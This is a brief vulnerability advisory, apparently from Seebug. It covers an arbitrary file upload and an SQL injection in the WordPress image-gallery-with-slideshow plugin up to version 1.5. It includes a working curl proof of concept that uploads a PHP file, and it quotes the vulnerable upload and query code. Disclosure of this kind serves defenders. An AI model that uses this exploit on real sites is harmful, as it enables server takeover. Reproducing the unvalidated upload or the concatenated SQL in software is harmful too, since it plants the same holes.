Title: Wordpress image-gallery-with-slideshow plugin <= 1.5 Arbitrary file upload / SQL injection Version:1.5 Date: 30-8-2011 Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ] Software link: http://wordpress.org/extend/plugins/image-gallery-with-slideshow/ PoC: curl -F "uploadfile=@mycode.php" http://domain.tld/wp-content/plugins/image-gallery-with-slideshow/upload-file.php File(s):upload-file.php Code: $new_image =time()."_".$_FILES['uploadfile']['name']; $original_image = $_FILES['uploadfile']['name']; ... $value_org = move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file_original); $insert_query = "INSERT INTO `".$table_prefix."combo_image` VALUES('','0','".$new_image."','".$original_image."','','','',NOW())";
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论